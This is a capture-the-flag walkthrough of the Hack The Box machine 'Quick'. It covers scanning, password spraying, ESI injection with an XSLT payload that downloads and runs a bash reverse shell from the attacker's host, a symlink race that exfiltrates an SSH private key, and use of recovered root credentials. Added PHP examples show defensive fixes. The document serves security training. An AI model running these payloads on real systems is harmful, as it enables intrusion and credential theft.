HTB WriteUps
Quick

Last updated 2 years ago

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.186 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

# Nmap 7.93 scan initiated Tue Apr  4 11:08:07 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
9001/tcp open  tor-orport

# Nmap done at Tue Apr  4 11:08:22 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,9001 10.10.10.186 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

# Nmap 7.93 scan initiated Tue Apr  4 11:08:43 2023 as: nmap -sCV -p22,9001 -Pn -n -oN targeted 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fbb0618239504b21a862984c9c388270 (RSA)
|   256 eebb4b72631710ee08ffe58671fe8f80 (ECDSA)
|_  256 80a6c27341f0354e5f61a76a50eab82e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Quick | Broadband Services
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  4 11:08:58 2023 -- 1 IP address (1 host up) scanned in 14.64 seconds

There seems to be a website running on port 9001. Let's take a look at it.

Exploitation

The update message has a link to https://portal.quick.htb/, but port 443 is closed on the machine. Maybe we can reach it another way, so let's try HTTP/3. First, we'll need to install quiche.

git clone --recursive https://github.com/cloudflare/quiche

cd quiche

cargo build --package quiche --release --features ffi,pkg-config-meta,qlog

mkdir quiche/deps/boringssl/src/lib

ln -vnf $(find target/release -name libcrypto.a -o -name libssl.a) quiche/deps/boringssl/src/lib/

Then, build curl.

cd ..

git clone https://github.com/curl/curl

cd curl

autoreconf -fi

./configure LDFLAGS="-Wl,-rpath,$PWD/../quiche/target/release" --with-openssl=$PWD/../quiche/quiche/deps/boringssl/src --with-quiche=$PWD/../quiche/target/release

make

make install

Now, we should have a version of curl that supports HTTP/3. Before trying to access https://portal.quick.htb/, we need to add the domain name to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.186    quick.htb    portal.quick.htb

Finally, check the HTTPS website with the curl we just built.

src/curl --http3 "https://portal.quick.htb/" -s -k

<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;
}

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;
}

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>
</ul>
</html>

The References page, accessible from index.php?view=docs, shows a few interesting files.

src/curl --http3 "https://portal.quick.htb/index.php?view=docs" -s -k

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
<ul>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>

Let's download and open the Connectivity.pdf file. In its How to Connect? section we'll find a password.

src/curl --http3 "https://portal.quick.htb/docs/Connectivity.pdf" -k -o Connectivity.pdf

open Connectivity.pdf

Now we need to find out where to authenticate, and with what user. Back to the main website, there was the button Get Started, which goes to the login.php login page.

On the other hand, at the bottom of the main page, we saw a list of testimonials from some people.

The Clients link goes to a list of companies with their respective countries. As the login page asks for an email, we can build a wordlist like the following by combining the first name of the person who wrote each testimonial with the company's domain name under its country's ccTLD.

nano users

tim@qconsulting.uk
tim@qconsulting.co.uk
roy@darkwing.us
elisa@wink.uk
elisa@wink.co.uk
james@lazycoop.cn

As we now have a list of emails, let's password-spray the password that we found across all these emails and see if it is valid for any of them. Note that the request body is single-quoted so the shell does not expand the $$ at the end of the password.

wfuzz -c -w users -d 'email=FUZZ&password=Quick4cc3$$' http://10.10.10.186:9001/login.php

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.186:9001/login.php
Total requests: 9

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                
=====================================================================

000000006:   200        0 L      2 W        80 Ch       "roy@darkwing.us"                                                                      
000000003:   200        0 L      2 W        80 Ch       "john@quick.htb"                                                                       
000000002:   200        0 L      2 W        80 Ch       "mike@quick.htb"                                                                       
000000008:   302        0 L      0 W        0 Ch        "elisa@wink.co.uk"                                                                     
000000007:   200        0 L      2 W        80 Ch       "elisa@wink.uk"                                                                        
000000004:   200        0 L      2 W        80 Ch       "tim@qconsulting.uk"                                                                   
000000005:   200        0 L      2 W        80 Ch       "tim@qconsulting.co.uk"                                                                
000000001:   200        0 L      2 W        80 Ch       "jane@quick.htb"                                                                       
000000009:   200        0 L      2 W        80 Ch       "james@lazycoop.cn"                                                                    

Total time: 0.102413
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 87.87931

The elisa@wink.co.uk email shows a different status code. Let's try to log in with that email and password.

We got in. It seems that the search bar of this ticketing system is not working, but from Raise Ticket we can raise a ticket.

If we submit the ticket, a popup message will appear with a ticket identifier.

We need to find a way to search for tickets. Let's enumerate the website using gobuster.

gobuster dir -u http://10.10.10.186:9001 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x php

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of concurrent threads, in this case 200.

  • -x file extensions to append to each word, in this case php.

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.186:9001
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/04/04 18:01:48 Starting gobuster in directory enumeration mode
===============================================================
/search.php           (Status: 200) [Size: 1]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 3353]
/home.php             (Status: 200) [Size: 86]
/login.php            (Status: 200) [Size: 4345]
/clients.php          (Status: 200) [Size: 2698]
/db.php               (Status: 200) [Size: 0]
/ticket.php           (Status: 200) [Size: 86]
/.php                 (Status: 403) [Size: 279]
Progress: 175328 / 175330 (100.00%)
===============================================================
2023/04/04 18:04:50 Finished
===============================================================

There is one file called search.php, and it asks for a search item.

If we add the search GET parameter with the ticket identifier as its value, we'll see the ticket we created before.

http://10.10.10.186:9001/search.php?search=TKT-5072

Let's see if there is a way to inject code in this ticketing system. If we take a look at the HTTP response headers, we'll see one called X-Powered-By that has the value Esigate.

curl http://10.10.10.186:9001 -I

HTTP/1.1 200 OK
Server: Apache/2.4.29 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Via: 1.1 localhost (Apache-HttpClient/4.5.2 (cache))
X-Powered-By: Esigate
Content-Length: 2

If we search the internet for common Esigate exploits, we'll find an article called ESI Injection Part 2: Abusing specific implementations, which explains how to get Remote Command Execution on the server. First, we need to create a file called rce with a reverse shell command pointing to our local system.

nano rce

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

Now, we need to create two files, rce.xml and rce.xsl, with the following code, which will download the rce file.

nano rce.xml

cp rce.xml rce.xsl

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[wget http://10.10.14.5/rce]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

Then, start a simple PHP HTTP server on port 80 in the directory where all these files are located.

php -S 0.0.0.0:80

And a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Next, create a new ticket with the following message.

<esi:include src="http://10.10.14.5/rce.xml" stylesheet="http://10.10.14.5/rce.xml"> </esi:include>

Copy the ticket identifier.

Now, if we search for the ticket, it will download the rce file from our HTTP server.

http://10.10.10.186:9001/search.php?search=TKT-2324

[Tue Apr  4 18:25:23 2023] 10.10.10.186:49454 [200]: GET /rce

Now we need to trigger the rce bash script and catch the reverse shell. We just need to change the command in both the rce.xml and rce.xsl files.

nano rce.xml

cp rce.xml rce.xsl

...
<xsl:variable name="cmd"><![CDATA[bash rce]]></xsl:variable>
...

Finally, if we reload the search.php page, the server will run the rce script, and we'll catch a reverse shell as sam. Then, we'll be able to grab the user flag.

http://10.10.10.186:9001/search.php?search=TKT-2324

Listening on 0.0.0.0 4444
Connection received on 10.10.10.186 44264
bash: cannot set terminal process group (1110): Inappropriate ioctl for device
bash: no job control in this shell
sam@quick:~$ whoami
whoami
sam
sam@quick:~$ cat user.txt
cat user.txt
34e254646f1732834991f7261317899c
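The root cause of this foothold is that Esigate, sitting in front of the application as a reverse proxy (see the Via and X-Powered-By headers above), interprets `<esi:include>` tags in the origin's response body, and search.php reflects the stored ticket text into that body unescaped. The following is an added example, not code from the machine or from the writeup, of how the ticket output should be rendered so no tag survives for the ESI processor, together with a small detector a defender could run over stored tickets to find ones that already carry ESI markup. The function names, the sample tickets and the ATTACKER-HOST placeholder are constructed for the example.

```php
<?php
// Added example; not code from the Quick machine or the writeup author.
// Esigate processes <esi:...> tags found in the origin's HTML. If user text
// such as a ticket message reaches the page body unescaped, the proxy treats
// the attacker's tags as instructions. Escaping on output removes the issue:
// "<" becomes "&lt;", so no tag is left for the ESI processor to parse.

// Render a ticket the way a safe search.php should: every user-controlled
// field is HTML-escaped before it is placed in the response body.
function render_ticket(string $id, string $message): string
{
    $escape = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<div class="ticket"><h2>' . $escape($id) . '</h2><p>'
        . $escape($message) . '</p></div>';
}

// Detection helper for defenders: flag stored ticket bodies that contain ESI
// markup (esi:include, esi:vars, esi:inline, ...). Case-insensitive and
// tolerant of whitespace after "<" and around the namespace colon.
function contains_esi_markup(string $text): bool
{
    return preg_match('/<\s*esi\s*:/i', $text) === 1;
}

// Constructed sample tickets; the second has the tag shape seen in this
// writeup, with the hostnames replaced by a placeholder.
$tickets = [
    'TKT-0001' => 'My broadband drops every evening around 8pm.',
    'TKT-0002' => '<esi:include src="http://ATTACKER-HOST/rce.xml" stylesheet="http://ATTACKER-HOST/rce.xml"> </esi:include>',
    'TKT-0003' => 'Please quote me for 1 <b>Gbps</b> fibre.',
];

foreach ($tickets as $id => $message) {
    $flag = contains_esi_markup($message) ? 'ESI markup' : 'clean';
    printf("%s: %s\n", $id, $flag);
    // Whatever the stored content, the rendered HTML carries no raw "<esi:" tag.
    $html = render_ticket($id, $message);
    printf("  rendered without ESI tags: %s\n", contains_esi_markup($html) ? 'no' : 'yes');
}
```

Output escaping is the application-side control; whether the proxy should process ESI tags coming from this origin at all is a separate Esigate configuration question that this writeup does not go into.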

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command on my local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

As seen below, there are other directories apart from the html directory in /var/www/.

ls -la /var/www

total 20
drwxr-xr-x  5 root root 4096 Dec 14  2021 .
drwxr-xr-x 14 root root 4096 Dec 14  2021 ..
drwxr-xr-x  2 root root 4096 Dec 14  2021 html
drwxrwxrwx  2 root root 4096 Apr  4 14:53 jobs
drwxr-xr-x  6 root root 4096 Dec 14  2021 printer

In fact, if we check the Apache /etc/apache2/sites-enabled/000-default.conf file, we'll see that a second virtual host is configured for the domain printerv2.quick.htb, served from /var/www/printer and running as the srvadm user.

cat /etc/apache2/sites-enabled/000-default.conf

<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>
<VirtualHost *:80>
        AssignUserId srvadm srvadm
        ServerName printerv2.quick.htb
        DocumentRoot /var/www/printer
</VirtualHost>

Let's add the domain name to our /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.186    quick.htb    portal.quick.htb    printerv2.quick.htb

There is another login page if we try to access the website.

As we have access to all the source code of the website, let's inspect it. The /var/www/printer/db.php file contains credentials for the MySQL database.

cat /var/www/printer/db.php

<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>

Let's connect to the database using those credentials and enumerate the database.

mysql -u db_adm -pdb_p4ss

There is one database called quick.

mysql> show databases;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| quick              |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

The quick database has three tables.

mysql> use quick;

mysql> show tables;

+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.01 sec)

The most interesting one is the users table, which has only two entries, containing the password hashes of the users Elisa and Server Admin.

mysql> select * from users;

+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)

In fact, we can see how the passwords are hashed in the index.php file. It first runs the password through crypt() with the fixed salt fa and then hashes the result with MD5.

cat /var/www/printer/index.php

...
$password = md5(crypt($password,'fa'));
...

As we won't be able to break the hash, we can simply change the hash of the srvadm@quick.htb user to be the same as Elisa's.

mysql> update users set password="c6c35ae1f3cb19438e0199cfa72a9d9d" where email="srvadm@quick.htb";

This way, we can log in as srvadm@quick.htb using the Quick4cc3$$ password.
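The scheme found in index.php, md5(crypt($password,'fa')), is weak on its own, independently of the hash-copy trick above. The added example below (not code from the machine or from the writeup) reproduces it next to a password_hash()/password_verify() pair and shows two consequences: the two-character salt selects traditional DES crypt, which ignores everything after the eighth character of the password, and the fixed salt means any two users with the same password get the same stored value, so shared passwords are visible in the table. Function names and the look-alike password are constructed for the example; the real password is the one from the writeup.

```php
<?php
// Added example; not code from the Quick machine or the writeup author.
// Reproduces the scheme in /var/www/printer/index.php and contrasts it with
// password_hash()/password_verify().

// The page's scheme. A two-character salt selects traditional DES crypt:
// only the first 8 characters of the password are used and the salt space is
// 12 bits. Wrapping the result in md5() changes its shape, not its strength.
function legacy_hash(string $password): string
{
    return md5(crypt($password, 'fa'));
}

function legacy_verify(string $password, string $stored): bool
{
    return hash_equals($stored, legacy_hash($password));
}

// Hardened replacement: a random per-user salt and a deliberately slow
// algorithm (bcrypt by default). Salt and cost travel inside the string, so
// there is no application-wide fixed salt.
function modern_hash(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function modern_verify(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// Constructed sample: the look-alike shares its first 8 characters with the
// real password and differs only after that.
$real      = 'Quick4cc3$$';
$lookAlike = 'Quick4cc-different-tail';

$legacy = legacy_hash($real);
printf("legacy stored value: %s\n", $legacy);
printf("legacy accepts real password    : %s\n", legacy_verify($real, $legacy) ? 'yes' : 'no');
printf("legacy accepts 8-char look-alike: %s\n", legacy_verify($lookAlike, $legacy) ? 'yes' : 'no');
printf("legacy value identical for a second user with the same password: %s\n",
    legacy_hash($real) === $legacy ? 'yes' : 'no');

$modern = modern_hash($real);
printf("modern accepts real password    : %s\n", modern_verify($real, $modern) ? 'yes' : 'no');
printf("modern accepts 8-char look-alike: %s\n", modern_verify($lookAlike, $modern) ? 'yes' : 'no');
printf("modern value identical for a second user with the same password: %s\n",
    modern_hash($real) === $modern ? 'yes' : 'no');
```

Whatever the hashing scheme, a database account whose plaintext credentials sit in a world-readable db.php lets anyone on the box overwrite a stored hash, so the hash algorithm is only part of the fix here.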

Once logged in, we'll see a print server website.

We can add a printer. As it is asking for an IP address, we can put our IP address, so we'll see what is going on with a netcat listener.

Set a netcat listener on port 5555.

nc -lvnp 5555

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Our new printer should be available from Printers.

By pressing the printer icon, we'll see a message saying that we should add a job.

From the PRINT JOBS section, we can create a new job, which will be received by the netcat listener when the Print button is pressed.

Listening on 0.0.0.0 5555
Connection received on 10.10.10.186 39462
testingVA

Let's inspect the source code and see if there is a way to escalate privileges. The /var/www/printer/job.php file has the following PHP code.

cat /var/www/printer/job.php

if($_SESSION["loggedin"])
{
        if(isset($_POST["submit"]))
        {
                $title=$_POST["title"];
                $file = date("Y-m-d_H:i:s");
                file_put_contents("/var/www/jobs/".$file,$_POST["desc"]);
                chmod("/var/www/printer/jobs/".$file,"0777");
                $stmt=$conn->prepare("select ip,port from jobs");
                $stmt->execute();
                $result=$stmt->get_result();
                if($result->num_rows > 0)
                {
                        $row=$result->fetch_assoc();
                        $ip=$row["ip"];
                        $port=$row["port"];
                        try
                        {
                                $connector = new NetworkPrintConnector($ip,$port);
                                sleep(0.5); //Buffer for socket check
                                $printer = new Printer($connector);
                                $printer -> text(file_get_contents("/var/www/jobs/".$file));
                                $printer -> cut();
                                $printer -> close();
                                $message="Job assigned";
                                unlink("/var/www/jobs/".$file);
                        }
                        catch(Exception $error) 
                        {
                                $error="Can't connect to printer.";
                                unlink("/var/www/jobs/".$file);
                        }
                }
                else
                {
                        $error="Couldn't find printer.";
                }
        }

For each new job, the web server creates a file in /var/www/jobs/ named after the current time in the format Y-m-d_H:i:s, writes the Bill Details of the job into it, connects to the configured printer and sends the file's content.

Before connecting, it waits 0.5 seconds, and only then reads the file back by its path. That gap is a race condition: /var/www/jobs is world-writable (drwxrwxrwx, as seen above), the file name is predictable, and the printer virtual host runs as srvadm (AssignUserId srvadm). So, in that window, we can replace the freshly created file with a symbolic link to the private SSH key of the srvadm user, and when the server connects to our machine it will send us the id_rsa private key instead of the job text.
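The defensive side of this race, as an added example that is not code from the machine or from the writeup: the vulnerable spool pattern from job.php next to a variant in which the swap is not possible. The hardened version uses a directory only the web server's user can write to, an unpredictable file name, exclusive creation so a pre-placed symlink is refused rather than followed, and reads the content back through the handle that wrote it instead of re-opening the path. Function names and the temporary directory are constructed for the example; both functions take the spool directory as a parameter so the demo can run offline.

```php
<?php
// Added example; not code from the Quick machine or the writeup author.
// Contrasts the spool pattern in /var/www/printer/job.php with a variant
// that closes the race window.

// Vulnerable pattern, as on the page: predictable name, shared world-writable
// directory, pause, then a second open by path. Anyone who can write to the
// directory can replace the file with a symlink between the two opens, and the
// second open follows the link with the web server's privileges.
function spool_job_vulnerable(string $spoolDir, string $desc): string
{
    $path = $spoolDir . '/' . date('Y-m-d_H:i:s');
    file_put_contents($path, $desc);
    sleep(1);                              // the window used by the race
    $data = file_get_contents($path);      // TOCTOU: re-opens by path
    unlink($path);
    return $data;
}

// Hardened variant.
function spool_job_hardened(string $spoolDir, string $desc): string
{
    // Refuse directories other users can write into; the race needs that.
    if (!is_dir($spoolDir) || (fileperms($spoolDir) & 0022) !== 0) {
        throw new RuntimeException('spool directory must not be group/world writable');
    }
    // Unpredictable name: an attacker cannot pre-create it.
    $path = $spoolDir . '/' . bin2hex(random_bytes(16));
    // 'x+' maps to O_CREAT|O_EXCL: it fails if anything, including a symlink,
    // already exists at the path, instead of following it.
    $fh = fopen($path, 'x+');
    if ($fh === false) {
        throw new RuntimeException('could not create spool file exclusively');
    }
    try {
        fwrite($fh, $desc);
        rewind($fh);
        // Read through the same handle: whatever happens to the directory
        // entry afterwards, this descriptor still refers to the file we wrote.
        $data = stream_get_contents($fh);
    } finally {
        fclose($fh);
        @unlink($path);
    }
    return $data;
}

// Demo against a private temporary directory (mode 0700).
$dir = sys_get_temp_dir() . '/spool-' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
try {
    echo spool_job_hardened($dir, "Bill details: 1 x fibre install\n");
    // A world-writable directory such as /tmp is rejected outright.
    try {
        spool_job_hardened(sys_get_temp_dir(), 'x');
    } catch (RuntimeException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
} finally {
    rmdir($dir);
}
```

Simpler still, the job text never needs to touch the filesystem: the printer library is handed a string, so passing the submitted description straight to $printer->text() removes the spool file, the chmod 0777 and the sleep along with the race.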

Go to /var/www/printer and run the following loop. It polls /var/www/jobs for a file named after the current second and, as soon as one appears, replaces it with a symbolic link to srvadm's private key (absolute paths are used so it works regardless of the current directory).

cd /var/www/printer

while true; do date=$(date +%F_%H:%M:%S); if [ -r "/var/www/jobs/$date" ]; then ln -sf /home/srvadm/.ssh/id_rsa "/var/www/jobs/$date"; fi; done

Now, go ahead and create a new job. When we hit Print, we should see the private SSH key of the srvadm user in our netcat listener.

Connection received on 10.10.10.186 39472
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
...
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----
VA

Copy and paste the key into the id_rsa file, give it the right permissions, and get a shell as srvadm.

nano id_rsa; chmod 600 id_rsa

ssh -i id_rsa srvadm@10.10.10.186

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Apr  4 19:10:20 UTC 2023

  System load:  1.13              Users logged in:                0
  Usage of /:   73.1% of 7.75GB   IP address for ens33:           10.10.10.186
  Memory usage: 16%               IP address for docker0:         172.17.0.1
  Swap usage:   0%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Processes:    186


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

52 packages can be updated.
27 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Apr  4 18:42:58 2023 from 10.10.14.5
srvadm@quick:~$ whoami
srvadm

If we check his home directory, we'll see the .cache folder.

ls -la

total 40                                                                                                                                  
drwxr-xr-x 6 srvadm srvadm 4096 Apr  4 18:44 .                                                                                            
drwxr-xr-x 4 root   root   4096 Mar 20  2020 ..                                                                                           
lrwxrwxrwx 1 srvadm srvadm    9 Mar 20  2020 .bash_history -> /dev/null                                                                   
-rw-r--r-- 1 srvadm srvadm  220 Mar 20  2020 .bash_logout                                                                                 
-rw-r--r-- 1 srvadm srvadm 3771 Mar 20  2020 .bashrc                                                                                      
drwx------ 5 srvadm srvadm 4096 Mar 20  2020 .cache                                                                                       
drwx------ 3 srvadm srvadm 4096 Mar 20  2020 .gnupg                                                                                       
drwxrwxr-x 3 srvadm srvadm 4096 Mar 20  2020 .local                                                                                       
-rw------- 1 srvadm srvadm   62 Apr  4 18:44 .mysql_history                                                                               
-rw-r--r-- 1 srvadm srvadm  807 Mar 20  2020 .profile                                                                                     
drwx------ 2 srvadm srvadm 4096 Mar 20  2020 .ssh

Which has a few more directories in it.

ls -la .cache/

total 20                                                                                                                                  
drwx------ 5 srvadm srvadm 4096 Mar 20  2020 .                                                                                            
drwxr-xr-x 6 srvadm srvadm 4096 Apr  4 18:44 ..                                                                                           
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 conf.d                                                                                       
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 logs                                                                                         
-rw-r--r-- 1 srvadm srvadm    0 Mar 20  2020 motd.legal-displayed                                                                         
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 packages

Inside the conf.d directory there is a file called printers.conf with some credentials in it.

cat .cache/conf.d/printers.conf

DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer

Let's URL-decode the URI.

php --interactive

Interactive shell

php > echo urldecode("DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer");
DeviceURI https://srvadm@quick.htb:&ftQ4K3SGde8?@printerv3.quick.htb/printer

We have a password that seems to be valid for the root user. So finally, all we have to do is reap the harvest and take the root flag.

su root

Password: 
root@quick:/home/srvadm# whoami
root
root@quick:/home/srvadm# cat /root/root.txt 
53b4aa89af24e5b268b63aa398042f78
